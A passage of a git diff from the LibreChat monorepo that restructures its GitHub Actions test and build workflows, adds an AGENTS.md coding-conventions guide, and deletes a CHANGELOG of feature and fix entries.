- name: Download data-provider build
|
||||||
|
uses: actions/download-artifact@v4
|
||||||
|
with:
|
||||||
|
name: build-data-provider
|
||||||
|
path: packages/data-provider/dist
|
||||||
|
|
||||||
|
- name: Run unit tests
|
||||||
run: cd packages/data-provider && npm run test:ci
|
run: cd packages/data-provider && npm run test:ci
|
||||||
|
|
||||||
- name: Run @librechat/data-schemas unit tests
|
test-data-schemas:
|
||||||
|
name: 'Tests: data-schemas'
|
||||||
|
needs: build
|
||||||
|
runs-on: ubuntu-latest
|
||||||
|
timeout-minutes: 10
|
||||||
|
steps:
|
||||||
|
- uses: actions/checkout@v4
|
||||||
|
|
||||||
|
- name: Use Node.js 20.19
|
||||||
|
uses: actions/setup-node@v4
|
||||||
|
with:
|
||||||
|
node-version: '20.19'
|
||||||
|
|
||||||
|
- name: Restore node_modules cache
|
||||||
|
id: cache-node-modules
|
||||||
|
uses: actions/cache@v4
|
||||||
|
with:
|
||||||
|
path: |
|
||||||
|
node_modules
|
||||||
|
api/node_modules
|
||||||
|
packages/api/node_modules
|
||||||
|
packages/data-provider/node_modules
|
||||||
|
packages/data-schemas/node_modules
|
||||||
|
key: node-modules-backend-${{ runner.os }}-20.19-${{ hashFiles('package-lock.json') }}
|
||||||
|
|
||||||
|
- name: Install dependencies
|
||||||
|
if: steps.cache-node-modules.outputs.cache-hit != 'true'
|
||||||
|
run: npm ci
|
||||||
|
|
||||||
|
- name: Download data-provider build
|
||||||
|
uses: actions/download-artifact@v4
|
||||||
|
with:
|
||||||
|
name: build-data-provider
|
||||||
|
path: packages/data-provider/dist
|
||||||
|
|
||||||
|
- name: Download data-schemas build
|
||||||
|
uses: actions/download-artifact@v4
|
||||||
|
with:
|
||||||
|
name: build-data-schemas
|
||||||
|
path: packages/data-schemas/dist
|
||||||
|
|
||||||
|
- name: Run unit tests
|
||||||
run: cd packages/data-schemas && npm run test:ci
|
run: cd packages/data-schemas && npm run test:ci
|
||||||
|
|
||||||
- name: Run @librechat/api unit tests
|
test-packages-api:
|
||||||
|
name: 'Tests: @librechat/api'
|
||||||
|
needs: build
|
||||||
|
runs-on: ubuntu-latest
|
||||||
|
timeout-minutes: 10
|
||||||
|
steps:
|
||||||
|
- uses: actions/checkout@v4
|
||||||
|
|
||||||
|
- name: Use Node.js 20.19
|
||||||
|
uses: actions/setup-node@v4
|
||||||
|
with:
|
||||||
|
node-version: '20.19'
|
||||||
|
|
||||||
|
- name: Restore node_modules cache
|
||||||
|
id: cache-node-modules
|
||||||
|
uses: actions/cache@v4
|
||||||
|
with:
|
||||||
|
path: |
|
||||||
|
node_modules
|
||||||
|
api/node_modules
|
||||||
|
packages/api/node_modules
|
||||||
|
packages/data-provider/node_modules
|
||||||
|
packages/data-schemas/node_modules
|
||||||
|
key: node-modules-backend-${{ runner.os }}-20.19-${{ hashFiles('package-lock.json') }}
|
||||||
|
|
||||||
|
- name: Install dependencies
|
||||||
|
if: steps.cache-node-modules.outputs.cache-hit != 'true'
|
||||||
|
run: npm ci
|
||||||
|
|
||||||
|
- name: Download data-provider build
|
||||||
|
uses: actions/download-artifact@v4
|
||||||
|
with:
|
||||||
|
name: build-data-provider
|
||||||
|
path: packages/data-provider/dist
|
||||||
|
|
||||||
|
- name: Download data-schemas build
|
||||||
|
uses: actions/download-artifact@v4
|
||||||
|
with:
|
||||||
|
name: build-data-schemas
|
||||||
|
path: packages/data-schemas/dist
|
||||||
|
|
||||||
|
- name: Download api build
|
||||||
|
uses: actions/download-artifact@v4
|
||||||
|
with:
|
||||||
|
name: build-api
|
||||||
|
path: packages/api/dist
|
||||||
|
|
||||||
|
- name: Run unit tests
|
||||||
run: cd packages/api && npm run test:ci
|
run: cd packages/api && npm run test:ci
|
||||||
|
|
|
||||||
189
.github/workflows/frontend-review.yml
vendored
189
.github/workflows/frontend-review.yml
vendored
|
|
@ -11,51 +11,200 @@ on:
|
||||||
- 'client/**'
|
- 'client/**'
|
||||||
- 'packages/data-provider/**'
|
- 'packages/data-provider/**'
|
||||||
|
|
||||||
|
env:
|
||||||
|
NODE_OPTIONS: '--max-old-space-size=${{ secrets.NODE_MAX_OLD_SPACE_SIZE || 6144 }}'
|
||||||
|
|
||||||
jobs:
|
jobs:
|
||||||
tests_frontend_ubuntu:
|
build:
|
||||||
name: Run frontend unit tests on Ubuntu
|
name: Build packages
|
||||||
timeout-minutes: 60
|
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
env:
|
timeout-minutes: 15
|
||||||
NODE_OPTIONS: '--max-old-space-size=${{ secrets.NODE_MAX_OLD_SPACE_SIZE || 6144 }}'
|
|
||||||
steps:
|
steps:
|
||||||
- uses: actions/checkout@v4
|
- uses: actions/checkout@v4
|
||||||
- name: Use Node.js 20.x
|
|
||||||
|
- name: Use Node.js 20.19
|
||||||
uses: actions/setup-node@v4
|
uses: actions/setup-node@v4
|
||||||
with:
|
with:
|
||||||
node-version: 20
|
node-version: '20.19'
|
||||||
cache: 'npm'
|
|
||||||
|
- name: Restore node_modules cache
|
||||||
|
id: cache-node-modules
|
||||||
|
uses: actions/cache@v4
|
||||||
|
with:
|
||||||
|
path: |
|
||||||
|
node_modules
|
||||||
|
client/node_modules
|
||||||
|
packages/client/node_modules
|
||||||
|
packages/data-provider/node_modules
|
||||||
|
key: node-modules-frontend-${{ runner.os }}-20.19-${{ hashFiles('package-lock.json') }}
|
||||||
|
|
||||||
- name: Install dependencies
|
- name: Install dependencies
|
||||||
|
if: steps.cache-node-modules.outputs.cache-hit != 'true'
|
||||||
run: npm ci
|
run: npm ci
|
||||||
|
|
||||||
- name: Build Client
|
- name: Restore data-provider build cache
|
||||||
run: npm run frontend:ci
|
id: cache-data-provider
|
||||||
|
uses: actions/cache@v4
|
||||||
|
with:
|
||||||
|
path: packages/data-provider/dist
|
||||||
|
key: build-data-provider-${{ runner.os }}-${{ hashFiles('packages/data-provider/src/**', 'packages/data-provider/tsconfig*.json', 'packages/data-provider/rollup.config.js', 'packages/data-provider/package.json') }}
|
||||||
|
|
||||||
|
- name: Build data-provider
|
||||||
|
if: steps.cache-data-provider.outputs.cache-hit != 'true'
|
||||||
|
run: npm run build:data-provider
|
||||||
|
|
||||||
|
- name: Restore client-package build cache
|
||||||
|
id: cache-client-package
|
||||||
|
uses: actions/cache@v4
|
||||||
|
with:
|
||||||
|
path: packages/client/dist
|
||||||
|
key: build-client-package-${{ runner.os }}-${{ hashFiles('packages/client/src/**', 'packages/client/tsconfig*.json', 'packages/client/rollup.config.js', 'packages/client/package.json', 'packages/data-provider/src/**', 'packages/data-provider/tsconfig*.json', 'packages/data-provider/rollup.config.js', 'packages/data-provider/package.json') }}
|
||||||
|
|
||||||
|
- name: Build client-package
|
||||||
|
if: steps.cache-client-package.outputs.cache-hit != 'true'
|
||||||
|
run: npm run build:client-package
|
||||||
|
|
||||||
|
- name: Upload data-provider build
|
||||||
|
uses: actions/upload-artifact@v4
|
||||||
|
with:
|
||||||
|
name: build-data-provider
|
||||||
|
path: packages/data-provider/dist
|
||||||
|
retention-days: 2
|
||||||
|
|
||||||
|
- name: Upload client-package build
|
||||||
|
uses: actions/upload-artifact@v4
|
||||||
|
with:
|
||||||
|
name: build-client-package
|
||||||
|
path: packages/client/dist
|
||||||
|
retention-days: 2
|
||||||
|
|
||||||
|
test-ubuntu:
|
||||||
|
name: 'Tests: Ubuntu'
|
||||||
|
needs: build
|
||||||
|
runs-on: ubuntu-latest
|
||||||
|
timeout-minutes: 15
|
||||||
|
steps:
|
||||||
|
- uses: actions/checkout@v4
|
||||||
|
|
||||||
|
- name: Use Node.js 20.19
|
||||||
|
uses: actions/setup-node@v4
|
||||||
|
with:
|
||||||
|
node-version: '20.19'
|
||||||
|
|
||||||
|
- name: Restore node_modules cache
|
||||||
|
id: cache-node-modules
|
||||||
|
uses: actions/cache@v4
|
||||||
|
with:
|
||||||
|
path: |
|
||||||
|
node_modules
|
||||||
|
client/node_modules
|
||||||
|
packages/client/node_modules
|
||||||
|
packages/data-provider/node_modules
|
||||||
|
key: node-modules-frontend-${{ runner.os }}-20.19-${{ hashFiles('package-lock.json') }}
|
||||||
|
|
||||||
|
- name: Install dependencies
|
||||||
|
if: steps.cache-node-modules.outputs.cache-hit != 'true'
|
||||||
|
run: npm ci
|
||||||
|
|
||||||
|
- name: Download data-provider build
|
||||||
|
uses: actions/download-artifact@v4
|
||||||
|
with:
|
||||||
|
name: build-data-provider
|
||||||
|
path: packages/data-provider/dist
|
||||||
|
|
||||||
|
- name: Download client-package build
|
||||||
|
uses: actions/download-artifact@v4
|
||||||
|
with:
|
||||||
|
name: build-client-package
|
||||||
|
path: packages/client/dist
|
||||||
|
|
||||||
- name: Run unit tests
|
- name: Run unit tests
|
||||||
run: npm run test:ci --verbose
|
run: npm run test:ci --verbose
|
||||||
working-directory: client
|
working-directory: client
|
||||||
|
|
||||||
tests_frontend_windows:
|
test-windows:
|
||||||
name: Run frontend unit tests on Windows
|
name: 'Tests: Windows'
|
||||||
timeout-minutes: 60
|
needs: build
|
||||||
runs-on: windows-latest
|
runs-on: windows-latest
|
||||||
env:
|
timeout-minutes: 20
|
||||||
NODE_OPTIONS: '--max-old-space-size=${{ secrets.NODE_MAX_OLD_SPACE_SIZE || 6144 }}'
|
|
||||||
steps:
|
steps:
|
||||||
- uses: actions/checkout@v4
|
- uses: actions/checkout@v4
|
||||||
- name: Use Node.js 20.x
|
|
||||||
|
- name: Use Node.js 20.19
|
||||||
uses: actions/setup-node@v4
|
uses: actions/setup-node@v4
|
||||||
with:
|
with:
|
||||||
node-version: 20
|
node-version: '20.19'
|
||||||
cache: 'npm'
|
|
||||||
|
- name: Restore node_modules cache
|
||||||
|
id: cache-node-modules
|
||||||
|
uses: actions/cache@v4
|
||||||
|
with:
|
||||||
|
path: |
|
||||||
|
node_modules
|
||||||
|
client/node_modules
|
||||||
|
packages/client/node_modules
|
||||||
|
packages/data-provider/node_modules
|
||||||
|
key: node-modules-frontend-${{ runner.os }}-20.19-${{ hashFiles('package-lock.json') }}
|
||||||
|
|
||||||
- name: Install dependencies
|
- name: Install dependencies
|
||||||
|
if: steps.cache-node-modules.outputs.cache-hit != 'true'
|
||||||
run: npm ci
|
run: npm ci
|
||||||
|
|
||||||
- name: Build Client
|
- name: Download data-provider build
|
||||||
run: npm run frontend:ci
|
uses: actions/download-artifact@v4
|
||||||
|
with:
|
||||||
|
name: build-data-provider
|
||||||
|
path: packages/data-provider/dist
|
||||||
|
|
||||||
|
- name: Download client-package build
|
||||||
|
uses: actions/download-artifact@v4
|
||||||
|
with:
|
||||||
|
name: build-client-package
|
||||||
|
path: packages/client/dist
|
||||||
|
|
||||||
- name: Run unit tests
|
- name: Run unit tests
|
||||||
run: npm run test:ci --verbose
|
run: npm run test:ci --verbose
|
||||||
working-directory: client
|
working-directory: client
|
||||||
|
|
||||||
|
build-verify:
|
||||||
|
name: Vite build verification
|
||||||
|
needs: build
|
||||||
|
runs-on: ubuntu-latest
|
||||||
|
timeout-minutes: 15
|
||||||
|
steps:
|
||||||
|
- uses: actions/checkout@v4
|
||||||
|
|
||||||
|
- name: Use Node.js 20.19
|
||||||
|
uses: actions/setup-node@v4
|
||||||
|
with:
|
||||||
|
node-version: '20.19'
|
||||||
|
|
||||||
|
- name: Restore node_modules cache
|
||||||
|
id: cache-node-modules
|
||||||
|
uses: actions/cache@v4
|
||||||
|
with:
|
||||||
|
path: |
|
||||||
|
node_modules
|
||||||
|
client/node_modules
|
||||||
|
packages/client/node_modules
|
||||||
|
packages/data-provider/node_modules
|
||||||
|
key: node-modules-frontend-${{ runner.os }}-20.19-${{ hashFiles('package-lock.json') }}
|
||||||
|
|
||||||
|
- name: Install dependencies
|
||||||
|
if: steps.cache-node-modules.outputs.cache-hit != 'true'
|
||||||
|
run: npm ci
|
||||||
|
|
||||||
|
- name: Download data-provider build
|
||||||
|
uses: actions/download-artifact@v4
|
||||||
|
with:
|
||||||
|
name: build-data-provider
|
||||||
|
path: packages/data-provider/dist
|
||||||
|
|
||||||
|
- name: Download client-package build
|
||||||
|
uses: actions/download-artifact@v4
|
||||||
|
with:
|
||||||
|
name: build-client-package
|
||||||
|
path: packages/client/dist
|
||||||
|
|
||||||
|
- name: Build client
|
||||||
|
run: cd client && npm run build:ci
|
||||||
|
|
|
||||||
166
AGENTS.md
Normal file
166
AGENTS.md
Normal file
|
|
@ -0,0 +1,166 @@
|
||||||
|
# LibreChat
|
||||||
|
|
||||||
|
## Project Overview
|
||||||
|
|
||||||
|
LibreChat is a monorepo with the following key workspaces:
|
||||||
|
|
||||||
|
| Workspace | Language | Side | Dependency | Purpose |
|
||||||
|
|---|---|---|---|---|
|
||||||
|
| `/api` | JS (legacy) | Backend | `packages/api`, `packages/data-schemas`, `packages/data-provider`, `@librechat/agents` | Express server — minimize changes here |
|
||||||
|
| `/packages/api` | **TypeScript** | Backend | `packages/data-schemas`, `packages/data-provider` | New backend code lives here (TS only, consumed by `/api`) |
|
||||||
|
| `/packages/data-schemas` | TypeScript | Backend | `packages/data-provider` | Database models/schemas, shareable across backend projects |
|
||||||
|
| `/packages/data-provider` | TypeScript | Shared | — | Shared API types, endpoints, data-service — used by both frontend and backend |
|
||||||
|
| `/client` | TypeScript/React | Frontend | `packages/data-provider`, `packages/client` | Frontend SPA |
|
||||||
|
| `/packages/client` | TypeScript | Frontend | `packages/data-provider` | Shared frontend utilities |
|
||||||
|
|
||||||
|
The source code for `@librechat/agents` (major backend dependency, same team) is at `/home/danny/agentus`.
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Workspace Boundaries
|
||||||
|
|
||||||
|
- **All new backend code must be TypeScript** in `/packages/api`.
|
||||||
|
- Keep `/api` changes to the absolute minimum (thin JS wrappers calling into `/packages/api`).
|
||||||
|
- Database-specific shared logic goes in `/packages/data-schemas`.
|
||||||
|
- Frontend/backend shared API logic (endpoints, types, data-service) goes in `/packages/data-provider`.
|
||||||
|
- Build data-provider from project root: `npm run build:data-provider`.
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Code Style
|
||||||
|
|
||||||
|
### Structure and Clarity
|
||||||
|
|
||||||
|
- **Never-nesting**: early returns, flat code, minimal indentation. Break complex operations into well-named helpers.
|
||||||
|
- **Functional first**: pure functions, immutable data, `map`/`filter`/`reduce` over imperative loops. Only reach for OOP when it clearly improves domain modeling or state encapsulation.
|
||||||
|
- **No dynamic imports** unless absolutely necessary.
|
||||||
|
|
||||||
|
### DRY
|
||||||
|
|
||||||
|
- Extract repeated logic into utility functions.
|
||||||
|
- Reusable hooks / higher-order components for UI patterns.
|
||||||
|
- Parameterized helpers instead of near-duplicate functions.
|
||||||
|
- Constants for repeated values; configuration objects over duplicated init code.
|
||||||
|
- Shared validators, centralized error handling, single source of truth for business rules.
|
||||||
|
- Shared typing system with interfaces/types extending common base definitions.
|
||||||
|
- Abstraction layers for external API interactions.
|
||||||
|
|
||||||
|
### Iteration and Performance
|
||||||
|
|
||||||
|
- **Minimize looping** — especially over shared data structures like message arrays, which are iterated frequently throughout the codebase. Every additional pass adds up at scale.
|
||||||
|
- Consolidate sequential O(n) operations into a single pass whenever possible; never loop over the same collection twice if the work can be combined.
|
||||||
|
- Choose data structures that reduce the need to iterate (e.g., `Map`/`Set` for lookups instead of `Array.find`/`Array.includes`).
|
||||||
|
- Avoid unnecessary object creation; consider space-time tradeoffs.
|
||||||
|
- Prevent memory leaks: careful with closures, dispose resources/event listeners, no circular references.
|
||||||
|
|
||||||
|
### Type Safety
|
||||||
|
|
||||||
|
- **Never use `any`**. Explicit types for all parameters, return values, and variables.
|
||||||
|
- **Limit `unknown`** — avoid `unknown`, `Record<string, unknown>`, and `as unknown as T` assertions. A `Record<string, unknown>` almost always signals a missing explicit type definition.
|
||||||
|
- **Don't duplicate types** — before defining a new type, check whether it already exists in the project (especially `packages/data-provider`). Reuse and extend existing types rather than creating redundant definitions.
|
||||||
|
- Use union types, generics, and interfaces appropriately.
|
||||||
|
- All TypeScript and ESLint warnings/errors must be addressed — do not leave unresolved diagnostics.
|
||||||
|
|
||||||
|
### Comments and Documentation
|
||||||
|
|
||||||
|
- Write self-documenting code; no inline comments narrating what code does.
|
||||||
|
- JSDoc only for complex/non-obvious logic or intellisense on public APIs.
|
||||||
|
- Single-line JSDoc for brief docs, multi-line for complex cases.
|
||||||
|
- Avoid standalone `//` comments unless absolutely necessary.
|
||||||
|
|
||||||
|
### Import Order
|
||||||
|
|
||||||
|
Imports are organized into three sections:
|
||||||
|
|
||||||
|
1. **Package imports** — sorted shortest to longest line length (`react` always first).
|
||||||
|
2. **`import type` imports** — sorted longest to shortest (package types first, then local types; length resets between sub-groups).
|
||||||
|
3. **Local/project imports** — sorted longest to shortest.
|
||||||
|
|
||||||
|
Multi-line imports count total character length across all lines. Consolidate value imports from the same module. Always use standalone `import type { ... }` — never inline `type` inside value imports.
|
||||||
|
|
||||||
|
### JS/TS Loop Preferences
|
||||||
|
|
||||||
|
- **Limit looping as much as possible.** Prefer single-pass transformations and avoid re-iterating the same data.
|
||||||
|
- `for (let i = 0; ...)` for performance-critical or index-dependent operations.
|
||||||
|
- `for...of` for simple array iteration.
|
||||||
|
- `for...in` only for object property enumeration.
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Frontend Rules (`client/src/**/*`)
|
||||||
|
|
||||||
|
### Localization
|
||||||
|
|
||||||
|
- All user-facing text must use `useLocalize()`.
|
||||||
|
- Only update English keys in `client/src/locales/en/translation.json` (other languages are automated externally).
|
||||||
|
- Semantic key prefixes: `com_ui_`, `com_assistants_`, etc.
|
||||||
|
|
||||||
|
### Components
|
||||||
|
|
||||||
|
- TypeScript for all React components with proper type imports.
|
||||||
|
- Semantic HTML with ARIA labels (`role`, `aria-label`) for accessibility.
|
||||||
|
- Group related components in feature directories (e.g., `SidePanel/Memories/`).
|
||||||
|
- Use index files for clean exports.
|
||||||
|
|
||||||
|
### Data Management
|
||||||
|
|
||||||
|
- Feature hooks: `client/src/data-provider/[Feature]/queries.ts` → `[Feature]/index.ts` → `client/src/data-provider/index.ts`.
|
||||||
|
- React Query (`@tanstack/react-query`) for all API interactions; proper query invalidation on mutations.
|
||||||
|
- QueryKeys and MutationKeys in `packages/data-provider/src/keys.ts`.
|
||||||
|
|
||||||
|
### Data-Provider Integration
|
||||||
|
|
||||||
|
- Endpoints: `packages/data-provider/src/api-endpoints.ts`
|
||||||
|
- Data service: `packages/data-provider/src/data-service.ts`
|
||||||
|
- Types: `packages/data-provider/src/types/queries.ts`
|
||||||
|
- Use `encodeURIComponent` for dynamic URL parameters.
|
||||||
|
|
||||||
|
### Performance
|
||||||
|
|
||||||
|
- Prioritize memory and speed efficiency at scale.
|
||||||
|
- Cursor pagination for large datasets.
|
||||||
|
- Proper dependency arrays to avoid unnecessary re-renders.
|
||||||
|
- Leverage React Query caching and background refetching.
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Development Commands
|
||||||
|
|
||||||
|
| Command | Purpose |
|
||||||
|
|---|---|
|
||||||
|
| `npm run smart-reinstall` | Install deps (if lockfile changed) + build via Turborepo |
|
||||||
|
| `npm run reinstall` | Clean install — wipe `node_modules` and reinstall from scratch |
|
||||||
|
| `npm run backend` | Start the backend server |
|
||||||
|
| `npm run backend:dev` | Start backend with file watching (development) |
|
||||||
|
| `npm run build` | Build all compiled code via Turborepo (parallel, cached) |
|
||||||
|
| `npm run frontend` | Build all compiled code sequentially (legacy fallback) |
|
||||||
|
| `npm run frontend:dev` | Start frontend dev server with HMR (port 3090, requires backend running) |
|
||||||
|
| `npm run build:data-provider` | Rebuild `packages/data-provider` after changes |
|
||||||
|
|
||||||
|
- Node.js: v20.19.0+ or ^22.12.0 or >= 23.0.0
|
||||||
|
- Database: MongoDB
|
||||||
|
- Backend runs on `http://localhost:3080/`; frontend dev server on `http://localhost:3090/`
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Testing
|
||||||
|
|
||||||
|
- Framework: **Jest**, run per-workspace.
|
||||||
|
- Run tests from their workspace directory: `cd api && npx jest <pattern>`, `cd packages/api && npx jest <pattern>`, etc.
|
||||||
|
- Frontend tests: `__tests__` directories alongside components; use `test/layout-test-utils` for rendering.
|
||||||
|
- Cover loading, success, and error states for UI/data flows.
|
||||||
|
|
||||||
|
### Philosophy
|
||||||
|
|
||||||
|
- **Real logic over mocks.** Exercise actual code paths with real dependencies. Mocking is a last resort.
|
||||||
|
- **Spies over mocks.** Assert that real functions are called with expected arguments and frequency without replacing underlying logic.
|
||||||
|
- **MongoDB**: use `mongodb-memory-server` for a real in-memory MongoDB instance. Test actual queries and schema validation, not mocked DB calls.
|
||||||
|
- **MCP**: use real `@modelcontextprotocol/sdk` exports for servers, transports, and tool definitions. Mirror real scenarios, don't stub SDK internals.
|
||||||
|
- Only mock what you cannot control: external HTTP APIs, rate-limited services, non-deterministic system calls.
|
||||||
|
- Heavy mocking is a code smell, not a testing strategy.
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Formatting
|
||||||
|
|
||||||
|
Fix all formatting lint errors (trailing spaces, tabs, newlines, indentation) using auto-fix when available. All TypeScript/ESLint warnings and errors **must** be resolved.
|
||||||
236
CHANGELOG.md
236
CHANGELOG.md
|
|
@ -1,236 +0,0 @@
|
||||||
# Changelog
|
|
||||||
|
|
||||||
All notable changes to this project will be documented in this file.
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
## [Unreleased]
|
|
||||||
|
|
||||||
### ✨ New Features
|
|
||||||
|
|
||||||
- ✨ feat: implement search parameter updates by **@mawburn** in [#7151](https://github.com/danny-avila/LibreChat/pull/7151)
|
|
||||||
- 🎏 feat: Add MCP support for Streamable HTTP Transport by **@benverhees** in [#7353](https://github.com/danny-avila/LibreChat/pull/7353)
|
|
||||||
- 🔒 feat: Add Content Security Policy using Helmet middleware by **@rubentalstra** in [#7377](https://github.com/danny-avila/LibreChat/pull/7377)
|
|
||||||
- ✨ feat: Add Normalization for MCP Server Names by **@danny-avila** in [#7421](https://github.com/danny-avila/LibreChat/pull/7421)
|
|
||||||
- 📊 feat: Improve Helm Chart by **@hofq** in [#3638](https://github.com/danny-avila/LibreChat/pull/3638)
|
|
||||||
- 🦾 feat: Claude-4 Support by **@danny-avila** in [#7509](https://github.com/danny-avila/LibreChat/pull/7509)
|
|
||||||
- 🪨 feat: Bedrock Support for Claude-4 Reasoning by **@danny-avila** in [#7517](https://github.com/danny-avila/LibreChat/pull/7517)
|
|
||||||
|
|
||||||
### 🌍 Internationalization
|
|
||||||
|
|
||||||
- 🌍 i18n: Add `Danish` and `Czech` and `Catalan` localization support by **@rubentalstra** in [#7373](https://github.com/danny-avila/LibreChat/pull/7373)
|
|
||||||
- 🌍 i18n: Update translation.json with latest translations by **@github-actions[bot]** in [#7375](https://github.com/danny-avila/LibreChat/pull/7375)
|
|
||||||
- 🌍 i18n: Update translation.json with latest translations by **@github-actions[bot]** in [#7468](https://github.com/danny-avila/LibreChat/pull/7468)
|
|
||||||
|
|
||||||
### 🔧 Fixes
|
|
||||||
|
|
||||||
- 💬 fix: update aria-label for accessibility in ConvoLink component by **@berry-13** in [#7320](https://github.com/danny-avila/LibreChat/pull/7320)
|
|
||||||
- 🔑 fix: use `apiKey` instead of `openAIApiKey` in OpenAI-like Config by **@danny-avila** in [#7337](https://github.com/danny-avila/LibreChat/pull/7337)
|
|
||||||
- 🔄 fix: update navigation logic in `useFocusChatEffect` to ensure correct search parameters are used by **@mawburn** in [#7340](https://github.com/danny-avila/LibreChat/pull/7340)
|
|
||||||
- 🔄 fix: Improve MCP Connection Cleanup by **@danny-avila** in [#7400](https://github.com/danny-avila/LibreChat/pull/7400)
|
|
||||||
- 🛡️ fix: Preset and Validation Logic for URL Query Params by **@danny-avila** in [#7407](https://github.com/danny-avila/LibreChat/pull/7407)
|
|
||||||
- 🌘 fix: artifact of preview text is illegible in dark mode by **@nhtruong** in [#7405](https://github.com/danny-avila/LibreChat/pull/7405)
|
|
||||||
- 🛡️ fix: Temporarily Remove CSP until Configurable by **@danny-avila** in [#7419](https://github.com/danny-avila/LibreChat/pull/7419)
|
|
||||||
- 💽 fix: Exclude index page `/` from static cache settings by **@sbruel** in [#7382](https://github.com/danny-avila/LibreChat/pull/7382)
|
|
||||||
|
|
||||||
### ⚙️ Other Changes
|
|
||||||
|
|
||||||
- 📜 docs: CHANGELOG for release v0.7.8 by **@github-actions[bot]** in [#7290](https://github.com/danny-avila/LibreChat/pull/7290)
|
|
||||||
- 📦 chore: Update API Package Dependencies by **@danny-avila** in [#7359](https://github.com/danny-avila/LibreChat/pull/7359)
|
|
||||||
- 📜 docs: Unreleased Changelog by **@github-actions[bot]** in [#7321](https://github.com/danny-avila/LibreChat/pull/7321)
|
|
||||||
- 📜 docs: Unreleased Changelog by **@github-actions[bot]** in [#7434](https://github.com/danny-avila/LibreChat/pull/7434)
|
|
||||||
- 🛡️ chore: `multer` v2.0.0 for CVE-2025-47935 and CVE-2025-47944 by **@danny-avila** in [#7454](https://github.com/danny-avila/LibreChat/pull/7454)
|
|
||||||
- 📂 refactor: Improve `FileAttachment` & File Form Deletion by **@danny-avila** in [#7471](https://github.com/danny-avila/LibreChat/pull/7471)
|
|
||||||
- 📊 chore: Remove Old Helm Chart by **@hofq** in [#7512](https://github.com/danny-avila/LibreChat/pull/7512)
|
|
||||||
- 🪖 chore: bump helm app version to v0.7.8 by **@austin-barrington** in [#7524](https://github.com/danny-avila/LibreChat/pull/7524)
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
---
|
|
||||||
## [v0.7.8] -
|
|
||||||
|
|
||||||
Changes from v0.7.8-rc1 to v0.7.8.
|
|
||||||
|
|
||||||
### ✨ New Features
|
|
||||||
|
|
||||||
- ✨ feat: Enhance form submission for touch screens by **@berry-13** in [#7198](https://github.com/danny-avila/LibreChat/pull/7198)
|
|
||||||
- 🔍 feat: Additional Tavily API Tool Parameters by **@glowforge-opensource** in [#7232](https://github.com/danny-avila/LibreChat/pull/7232)
|
|
||||||
- 🐋 feat: Add python to Dockerfile for increased MCP compatibility by **@technicalpickles** in [#7270](https://github.com/danny-avila/LibreChat/pull/7270)
|
|
||||||
|
|
||||||
### 🔧 Fixes
|
|
||||||
|
|
||||||
- 🔧 fix: Google Gemma Support & OpenAI Reasoning Instructions by **@danny-avila** in [#7196](https://github.com/danny-avila/LibreChat/pull/7196)
|
|
||||||
- 🛠️ fix: Conversation Navigation State by **@danny-avila** in [#7210](https://github.com/danny-avila/LibreChat/pull/7210)
|
|
||||||
- 🔄 fix: o-Series Model Regex for System Messages by **@danny-avila** in [#7245](https://github.com/danny-avila/LibreChat/pull/7245)
|
|
||||||
- 🔖 fix: Custom Headers for Initial MCP SSE Connection by **@danny-avila** in [#7246](https://github.com/danny-avila/LibreChat/pull/7246)
|
|
||||||
- 🛡️ fix: Deep Clone `MCPOptions` for User MCP Connections by **@danny-avila** in [#7247](https://github.com/danny-avila/LibreChat/pull/7247)
|
|
||||||
- 🔄 fix: URL Param Race Condition and File Draft Persistence by **@danny-avila** in [#7257](https://github.com/danny-avila/LibreChat/pull/7257)
|
|
||||||
- 🔄 fix: Assistants Endpoint & Minor Issues by **@danny-avila** in [#7274](https://github.com/danny-avila/LibreChat/pull/7274)
|
|
||||||
- 🔄 fix: Ollama Think Tag Edge Case with Tools by **@danny-avila** in [#7275](https://github.com/danny-avila/LibreChat/pull/7275)
|
|
||||||
|
|
||||||
### ⚙️ Other Changes
|
|
||||||
|
|
||||||
- 📜 docs: CHANGELOG for release v0.7.8-rc1 by **@github-actions[bot]** in [#7153](https://github.com/danny-avila/LibreChat/pull/7153)
|
|
||||||
- 🔄 refactor: Artifact Visibility Management by **@danny-avila** in [#7181](https://github.com/danny-avila/LibreChat/pull/7181)
|
|
||||||
- 📦 chore: Bump Package Security by **@danny-avila** in [#7183](https://github.com/danny-avila/LibreChat/pull/7183)
|
|
||||||
- 🌿 refactor: Unmount Fork Popover on Hide for Better Performance by **@danny-avila** in [#7189](https://github.com/danny-avila/LibreChat/pull/7189)
|
|
||||||
- 🧰 chore: ESLint configuration to enforce Prettier formatting rules by **@mawburn** in [#7186](https://github.com/danny-avila/LibreChat/pull/7186)
|
|
||||||
- 🎨 style: Improve KaTeX Rendering for LaTeX Equations by **@andresgit** in [#7223](https://github.com/danny-avila/LibreChat/pull/7223)
|
|
||||||
- 📝 docs: Update `.env.example` Google models by **@marlonka** in [#7254](https://github.com/danny-avila/LibreChat/pull/7254)
|
|
||||||
- 💬 refactor: MCP Chat Visibility Option, Google Rates, Remove OpenAPI Plugins by **@danny-avila** in [#7286](https://github.com/danny-avila/LibreChat/pull/7286)
|
|
||||||
- 📜 docs: Unreleased Changelog by **@github-actions[bot]** in [#7214](https://github.com/danny-avila/LibreChat/pull/7214)
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
[See full release details][release-v0.7.8]
|
|
||||||
|
|
||||||
[release-v0.7.8]: https://github.com/danny-avila/LibreChat/releases/tag/v0.7.8
|
|
||||||
|
|
||||||
---
|
|
||||||
## [v0.7.8-rc1] -
|
|
||||||
|
|
||||||
Changes from v0.7.7 to v0.7.8-rc1.
|
|
||||||
|
|
||||||
### ✨ New Features
|
|
||||||
|
|
||||||
- 🔍 feat: Mistral OCR API / Upload Files as Text by **@danny-avila** in [#6274](https://github.com/danny-avila/LibreChat/pull/6274)
|
|
||||||
- 🤖 feat: Support OpenAI Web Search models by **@danny-avila** in [#6313](https://github.com/danny-avila/LibreChat/pull/6313)
|
|
||||||
